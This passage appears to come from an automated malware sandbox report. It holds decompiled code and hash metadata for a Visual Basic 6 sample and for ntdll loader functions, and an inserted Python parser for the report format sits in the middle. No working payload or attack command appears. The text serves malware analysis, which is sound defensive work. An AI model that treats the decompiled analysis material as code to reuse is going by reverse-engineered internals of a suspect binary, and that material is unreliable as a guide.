                                                        				intOrPtr _v28;
                                                        				void* _v32;
                                                        				short _v36;
                                                        				signed int _v40;
                                                        				signed int _v52;
                                                        				signed int _t31;
                                                        				short _t32;
                                                        				void* _t39;
                                                        				void* _t41;
                                                        				intOrPtr _t42;
                                                        
                                                        				_t42 = _t41 - 0xc;
                                                        				 *[fs:0x0] = _t42;
                                                        				L00401210();
                                                        				_v16 = _t42;
                                                        				_v12 = 0x4011d8;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401216, _t39);
                                                        				L0040130C();
                                                        				_t31 =  *((intOrPtr*)( *_a4 + 0x128))(_a4,  &_v36);
                                                        				asm("fclex");
                                                        				_v40 = _t31;
                                                        				if(_v40 >= 0) {
                                                        					_v52 = _v52 & 0x00000000;
                                                        				} else {
                                                        					_push(0x128);
                                                        					_push(0x404514);
                                                        					_push(_a4);
                                                        					_push(_v40);
                                                        					L0040131E();
                                                        					_v52 = _t31;
                                                        				}
                                                        				_t32 = _v36;
                                                        				_v28 = _t32;
                                                        				_push(0x411325);
                                                        				L00401306();
                                                        				return _t32;
                                                        			}

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 004112A6
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 004112D0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004011D8,00404514,00000128), ref: 00411302
                                                        • __vbaFreeStr.MSVBVM60(00411325), ref: 0041131F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$CheckChkstkCopyFreeHresult
                                                        • String ID:
                                                        • API String ID: 3646427762-0
                                                        • Opcode ID: 7999376da3b9b74b39fed0972b46315ec1f19a8572d2332d7a28a22a0d7d4cbf
                                                        • Instruction ID: 48cd958be259184c27d84eb6308513cf8b0d75afe1df01352d58e835bafb8a10
                                                        • Opcode Fuzzy Hash: 7999376da3b9b74b39fed0972b46315ec1f19a8572d2332d7a28a22a0d7d4cbf
                                                        • Instruction Fuzzy Hash: 17110374940208AFDB00EF95C845BEEBBF4FB08754F10806AF904BB2A5C7799A45CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 316c4ad7c60feb8648d93478b44194236b0f91e9d8d310acc5511db81268e589
                                                        • Instruction ID: 4aba6a8080ac9f28fffa514b481f187143175a4b1d1c8b580af4c525e9da5c76
                                                        • Opcode Fuzzy Hash: 316c4ad7c60feb8648d93478b44194236b0f91e9d8d310acc5511db81268e589
                                                        • Instruction Fuzzy Hash: 6290027120100803D1C0716A441468E000597D1781FD1C125E0025614DCA559A5977E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 5c2947f719a40d73189eb60a19002f624ea5288f20aa194b9006e050c02441fb
                                                        • Instruction ID: 85daf03f0df1cff84c1e1f2c98014d7a22f5d6efbd00b590cde655fd235101b8
                                                        • Opcode Fuzzy Hash: 5c2947f719a40d73189eb60a19002f624ea5288f20aa194b9006e050c02441fb
                                                        • Instruction Fuzzy Hash: 5890027120108803D150616A841478E000597D0781F95C521E4424618DC6D598917162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 20753689beae20d3efe6635595d66bfe4f2c3f7ffd1424afe498bb2d829feb6d
                                                        • Instruction ID: f4a2058290498c573d02a91e234f3eeb3009f6d034e0fad24c4f39439f03566a
                                                        • Opcode Fuzzy Hash: 20753689beae20d3efe6635595d66bfe4f2c3f7ffd1424afe498bb2d829feb6d
                                                        • Instruction Fuzzy Hash: 7390027120100403D14065AA541868A000597E0781F91D121E5024515EC6A598917172
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 52da63586eef093d4920d6853731d2edd752d9bbd13ecb01b6214f5c7eee472c
                                                        • Instruction ID: 7fd5324e903c70f97d079c21428eb1d2a83025e7d693ec39ee85060f472d2669
                                                        • Opcode Fuzzy Hash: 52da63586eef093d4920d6853731d2edd752d9bbd13ecb01b6214f5c7eee472c
                                                        • Instruction Fuzzy Hash: 0A90026130100003D180716A542864A4005E7E1781F91D121E0414514CD95598566263
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9593d29b766f107502c53bd9a5058fc19499c9fb5208aa73c1889dae21ae25b5
                                                        • Instruction ID: efe307d326d3633b88253cd6170707a5ffa101904c4cfe83ea36a72d676cc10e
                                                        • Opcode Fuzzy Hash: 9593d29b766f107502c53bd9a5058fc19499c9fb5208aa73c1889dae21ae25b5
                                                        • Instruction Fuzzy Hash: 7990026921300003D1C0716A541864E000597D1682FD1D525E0015518CC95598696362
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2a5f260a615e07993b2262cebe5b67656e7ea0fb67f707498be80699919ddb31
                                                        • Instruction ID: 5babd26b257aa963d3ca7cdde699d50dc9d2339bcf11ec74f36bad23cb927117
                                                        • Opcode Fuzzy Hash: 2a5f260a615e07993b2262cebe5b67656e7ea0fb67f707498be80699919ddb31
                                                        • Instruction Fuzzy Hash: AE900265211000030145A56A071454B004697D57D1391C131F1015510CD66198616162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2f119638be473d217dcbdb5a1c8102c5340e6468cdb75b6aa44ee4c2ace00584
                                                        • Instruction ID: 5ad0557e39fa07cae67b542c8b4a4fc8fb25f6964eb8bfcb2b11b617d56719a2
                                                        • Opcode Fuzzy Hash: 2f119638be473d217dcbdb5a1c8102c5340e6468cdb75b6aa44ee4c2ace00584
                                                        • Instruction Fuzzy Hash: 709002A1202000034145716A442465A400A97E0681B91C131E1014550DC56598917166
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b81978c24d3bd21c81cb5695a2daaedacd1a92197917bcc5fd30d5455cc9816c
                                                        • Instruction ID: ef8162a856f95cde59ec2f98cdc485defa695f717111ea1f99f84f9526217854
                                                        • Opcode Fuzzy Hash: b81978c24d3bd21c81cb5695a2daaedacd1a92197917bcc5fd30d5455cc9816c
                                                        • Instruction Fuzzy Hash: A3900261601000434180717A885494A4005BBE1691791C231E0998510DC599986566A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a444eda5c8975756f7ab425ed3fdac76759cf2a84be40112158f5e26d63dfe93
                                                        • Instruction ID: 189a0df60673384b791f471cf286305842269ccd59745f18aec4605dad7cf277
                                                        • Opcode Fuzzy Hash: a444eda5c8975756f7ab425ed3fdac76759cf2a84be40112158f5e26d63dfe93
                                                        • Instruction Fuzzy Hash: 8590027120140403D140616A482474F000597D0782F91C121E1164515DC665985175B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 87b884f4e22e80e87bf5d1377a055fdf78e60e8f5bc74981fa7b7cf02045872a
                                                        • Instruction ID: 3e66de946989344375fcaba3115cff85dbae8f10c9d2abd2fa6832f2e7bbc6f2
                                                        • Opcode Fuzzy Hash: 87b884f4e22e80e87bf5d1377a055fdf78e60e8f5bc74981fa7b7cf02045872a
                                                        • Instruction Fuzzy Hash: 5290026121180043D240657A4C24B4B000597D0783F91C225E0154514CC95598616562
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: aea258c10add58173968455284f2824fe5cb39811d63f3c0f7a6b751290e854d
                                                        • Instruction ID: b349b1f38f97136268df4b7d2be574d5f48db764f08aa498a76ca2d4a025e584
                                                        • Opcode Fuzzy Hash: aea258c10add58173968455284f2824fe5cb39811d63f3c0f7a6b751290e854d
                                                        • Instruction Fuzzy Hash: E090027120100413D151616A451474B000997D06C1FD1C522E0424518DD6969952B162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a714a97545a4b328babd2a77473ea3e5a72a2d42afa58aaa3461b945a453a11a
                                                        • Instruction ID: 9db79a74084ebf9d49e50e3799e797d503dbaf1aac24ee99e2c9750f432e3c45
                                                        • Opcode Fuzzy Hash: a714a97545a4b328babd2a77473ea3e5a72a2d42afa58aaa3461b945a453a11a
                                                        • Instruction Fuzzy Hash: 68900261242041535585B16A441454B4006A7E06C17D1C122E1414910CC566A856E662
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 636807d7468e397ff7e3fd35bd08f34919b54259f3ed52061668f4be5846b47a
                                                        • Instruction ID: 5ccffb231e8e9a1ed7399d5055103ceb2ff5208b90d4c9969223e87d6a82372e
                                                        • Opcode Fuzzy Hash: 636807d7468e397ff7e3fd35bd08f34919b54259f3ed52061668f4be5846b47a
                                                        • Instruction Fuzzy Hash: 3090026160100503D141716A441465A000A97D06C1FD1C132E1024515ECA659992B172
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f4fa9d40044e7e208d9bf22243f44cb50ee1b698bed719413ffa699e005bc9e4
                                                        • Instruction ID: 558261d14578530be422361f1aaf0ae9257f3ee4ab3c0e4a3bbee78a4ec362ce
                                                        • Opcode Fuzzy Hash: f4fa9d40044e7e208d9bf22243f44cb50ee1b698bed719413ffa699e005bc9e4
                                                        • Instruction Fuzzy Hash: 889002B120100403D180716A441478A000597D0781F91C121E5064514EC6999DD576A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0ce995c8471de63aeebbb0a6a5f409ee7c2dbc9f8b7ce9f14736de8fdbd80407
                                                        • Instruction ID: eee66c89932149f5fcb0fd7ac00f2599f1a3b6750c53228adb26a5fb3b2e2ce6
                                                        • Opcode Fuzzy Hash: 0ce995c8471de63aeebbb0a6a5f409ee7c2dbc9f8b7ce9f14736de8fdbd80407
                                                        • Instruction Fuzzy Hash: C39002A134100443D140616A4424B4A0005D7E1781F91C125E1064514DC659DC527167
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8a9a49f500d6ec4eb13666b8c967cc9e3d23206607fee9db0a67e8c29538d835
                                                        • Instruction ID: 280d359abc38f5a2bb46c3cf387434054f3d9915fa6e03cd05d34973b86c83ee
                                                        • Opcode Fuzzy Hash: 8a9a49f500d6ec4eb13666b8c967cc9e3d23206607fee9db0a67e8c29538d835
                                                        • Instruction Fuzzy Hash: 24B09B719014D6C7D641D771561871B7A017BD4B41F66C161D2030741E8778D091F5B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 39%
                                                        			E1E298E00(void* __ecx) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr* _t32;
                                                        				intOrPtr _t35;
                                                        				intOrPtr _t43;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        				void* _t48;
                                                        				signed int _t49;
                                                        				void* _t50;
                                                        				intOrPtr* _t51;
                                                        				signed int _t52;
                                                        				void* _t53;
                                                        				intOrPtr _t55;
                                                        
                                                        				_v8 =  *0x1e35d360 ^ _t52;
                                                        				_t49 = 0;
                                                        				_t48 = __ecx;
                                                        				_t55 =  *0x1e358464; // 0x75150110
                                                        				if(_t55 == 0) {
                                                        					L9:
                                                        					if( !_t49 >= 0) {
                                                        						if(( *0x1e355780 & 0x00000003) != 0) {
                                                        							E1E2E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                        						}
                                                        						if(( *0x1e355780 & 0x00000010) != 0) {
                                                        							asm("int3");
                                                        						}
                                                        					}
                                                        					return E1E2AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                        				}
                                                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                        				_t43 =  *0x1e357984; // 0x882b48
                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                        					if(_t48 == _t43) {
                                                        						_t50 = 0x5c;
                                                        						if( *_t32 == _t50) {
                                                        							_push("true");
                                                        							_pop(_t46);
                                                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                        								_t32 = _t32 + 8;
                                                        							}
                                                        						}
                                                        					}
                                                        					_t51 =  *0x1e358464; // 0x75150110
                                                        					 *0x1e35b1e0(_t47, _t32,  &_v12);
                                                        					_t49 =  *_t51();
                                                        					if(_t49 >= 0) {
                                                        						L8:
                                                        						_t35 = _v12;
                                                        						if(_t35 != 0) {
                                                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                        								E1E299B10( *((intOrPtr*)(_t48 + 0x48)));
                                                        								_t35 = _v12;
                                                        							}
                                                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                        						}
                                                        						goto L9;
                                                        					}
                                                        					if(_t49 != 0xc000008a) {
                                                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                        							if(_t49 != 0xc00000bb) {
                                                        								goto L8;
                                                        							}
                                                        						}
                                                        					}
                                                        					if(( *0x1e355780 & 0x00000005) != 0) {
                                                        						_push(_t49);
                                                        						E1E2E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                        						_t53 = _t53 + 0x1c;
                                                        					}
                                                        					_t49 = 0;
                                                        					goto L8;
                                                        				} else {
                                                        					goto L9;
                                                        				}
                                                        			}

                                                        Address column of the decompiled listing above (the per-line instruction addresses, separated from the code by extraction): 0x1e298e0f to 0x1e298ed2 for the main body, and 0x1e2d92a8 to 0x1e2d9381 for the out-of-line blocks that hold the DebugPrint calls (see the string xrefs below).

                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 1E2D933B, 1E2D9367
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 1E2D9357
                                                        • LdrpFindDllActivationContext, xrefs: 1E2D9331, 1E2D935D
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E2D932A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-3779518884
                                                        • Opcode ID: 49bf0e61a850786dbb45e68d92a2e974ef18a582ad333a75c9b5a32c2fef0006
                                                        • Instruction ID: c93f6098fcf43f9c9276935c4e4886fad3eebfb99cb104dafbe9273dc3967561
                                                        • Opcode Fuzzy Hash: 49bf0e61a850786dbb45e68d92a2e974ef18a582ad333a75c9b5a32c2fef0006
                                                        • Instruction Fuzzy Hash: F0412932A10377DFD7199B35C8B8A56F3A6BB44204F2E5729F98857291E7F06C80D681
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
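Every function entry on this page repeats the same layout: an optional "C-Code - Quality" block, then the "APIs", "Strings", "Memory Dump Source", "Similarity" and "Uniqueness" headings with bullet fields under them. When triaging a report like this one it is useful to turn those entries into records, so that the many InitializeThunk stubs can be counted and set aside, the few functions that reference strings (such as the LdrpFindDllActivationContext entry above) surface first, and the Instruction Fuzzy Hash values can be pulled out for matching against other reports. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. The sample input is constructed from two entries on this page, and the record keys ("fields", "strings", "offset", "score") are this example's own naming.

```python
import re
from collections import defaultdict

FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")          # "• Key: value"
STRING_RE = re.compile(r"^•\s*(.*?),\s*xrefs:\s*(.*)$")   # "• text, xrefs: A, B"
QUALITY_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%")
HEADINGS = ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness")


def _new_entry():
    return {"quality": None, "code": [], "strings": [], "fields": {},
            "source": None, "offset": None, "based_on_pe": None, "score": None}


def parse_entries(text):
    """One dict per function entry; an entry ends at its Uniqueness Score line."""
    entries, cur, section = [], _new_entry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := QUALITY_RE.match(line):          # decompiled C follows until "APIs"
            cur["quality"], section = int(m.group(1)), "code"
        elif line in HEADINGS:                   # headings decide how bullets are read
            section = line
        elif m := SCORE_RE.match(line):          # closes the entry
            cur["score"] = float(m.group(1))
            entries.append(cur)
            cur, section = _new_entry(), None
        elif section == "code":
            cur["code"].append(raw.rstrip())
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur["strings"].append((m.group(1), [x.strip() for x in m.group(2).split(",")]))
        elif section == "Memory Dump Source" and (m := FIELD_RE.match(line)):
            if m.group(1) == "Source File":      # "<dump>, Offset: <hex>, based on PE: <bool>"
                parts = [p.strip() for p in m.group(2).split(",")]
                cur["source"] = parts[0]
                for key, _, val in (p.partition(":") for p in parts[1:]):
                    if key.strip() == "Offset":
                        cur["offset"] = int(val.strip(), 16)
                    elif key.strip() == "based on PE":
                        cur["based_on_pe"] = val.strip() == "true"
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur["fields"][m.group(1)] = m.group(2)
    return entries


def summarize(entries):
    """Triage view: Opcode IDs per API ID, entries with strings, fuzzy hashes."""
    by_api = defaultdict(list)
    for e in entries:
        by_api[e["fields"].get("API ID", "")].append(e["fields"].get("Opcode ID"))
    return {
        "by_api": dict(by_api),
        "with_strings": [e["fields"]["Opcode ID"] for e in entries if e["strings"]],
        "fuzzy_hashes": {e["fields"]["Opcode ID"]: e["fields"]["Instruction Fuzzy Hash"]
                         for e in entries},
    }


# Constructed sample in the report's own layout: one InitializeThunk stub and the
# LdrpFindDllActivationContext entry, both copied from this page (trailing
# "Download File" link text kept on purpose, as the HTML export leaves it).
SAMPLE_REPORT = """\
APIs
Memory Dump Source
• Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
• Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9593d29b766f107502c53bd9a5058fc19499c9fb5208aa73c1889dae21ae25b5
• Instruction Fuzzy Hash: 7990026921300003D1C0716A541864E000597D1682FD1D525E0015518CC95598696362
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 39%
    E1E298E00(void* __ecx) {
    }
APIs
Strings
• minkernel\\ntdll\\ldrsnap.c, xrefs: 1E2D933B, 1E2D9367
• LdrpFindDllActivationContext, xrefs: 1E2D9331, 1E2D935D
Memory Dump Source
• Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
Similarity
• API ID: DebugPrintTimes
• String ID: LdrpFindDllActivationContext$minkernel\\ntdll\\ldrsnap.c
• API String ID: 3446177414-3779518884
• Opcode ID: 49bf0e61a850786dbb45e68d92a2e974ef18a582ad333a75c9b5a32c2fef0006
• Instruction Fuzzy Hash: F0412932A10377DFD7199B35C8B8A56F3A6BB44204F2E5729F98857291E7F06C80D681
Uniqueness

Uniqueness Score: -1.00%
"""
```

Run it as `summarize(parse_entries(SAMPLE_REPORT))`, or feed it the text of a full report: the "by_api" map shows how many entries are plain InitializeThunk stubs, "with_strings" lists the functions that deserve a read, and "fuzzy_hashes" can be diffed against the same map from another sandbox run to see which code regions are shared.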

                                                        C-Code - Quality: 50%
                                                        			E1E33E824(signed int __ecx, signed int* __edx) {
                                                        				signed int _v8;
                                                        				signed char _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				signed int _v36;
                                                        				signed int _v40;
                                                        				unsigned int _v44;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t177;
                                                        				signed int _t179;
                                                        				unsigned int _t202;
                                                        				signed char _t207;
                                                        				signed char _t210;
                                                        				signed int _t230;
                                                        				void* _t244;
                                                        				unsigned int _t247;
                                                        				signed int _t288;
                                                        				signed int _t289;
                                                        				signed int _t291;
                                                        				signed char _t293;
                                                        				signed char _t295;
                                                        				signed char _t298;
                                                        				intOrPtr* _t303;
                                                        				signed int _t310;
                                                        				signed char _t316;
                                                        				signed int _t319;
                                                        				signed char _t323;
                                                        				signed char _t330;
                                                        				signed int _t334;
                                                        				signed int _t337;
                                                        				signed int _t341;
                                                        				signed char _t345;
                                                        				signed char _t347;
                                                        				signed int _t353;
                                                        				signed char _t354;
                                                        				void* _t383;
                                                        				signed char _t385;
                                                        				signed char _t386;
                                                        				unsigned int _t392;
                                                        				signed int _t393;
                                                        				signed int _t395;
                                                        				signed int _t398;
                                                        				signed int _t399;
                                                        				signed int _t401;
                                                        				unsigned int _t403;
                                                        				void* _t404;
                                                        				unsigned int _t405;
                                                        				signed int _t406;
                                                        				signed char _t412;
                                                        				unsigned int _t413;
                                                        				unsigned int _t418;
                                                        				void* _t419;
                                                        				void* _t420;
                                                        				void* _t421;
                                                        				void* _t422;
                                                        				void* _t423;
                                                        				signed char* _t425;
                                                        				signed int _t426;
                                                        				signed int _t428;
                                                        				unsigned int _t430;
                                                        				signed int _t431;
                                                        				signed int _t433;
                                                        
                                                        				_v8 =  *0x1e35d360 ^ _t433;
                                                        				_v40 = __ecx;
                                                        				_v16 = __edx;
                                                        				_t289 = 0x4cb2f;
                                                        				_t425 = __edx[1];
                                                        				_t403 =  *__edx << 2;
                                                        				if(_t403 < 8) {
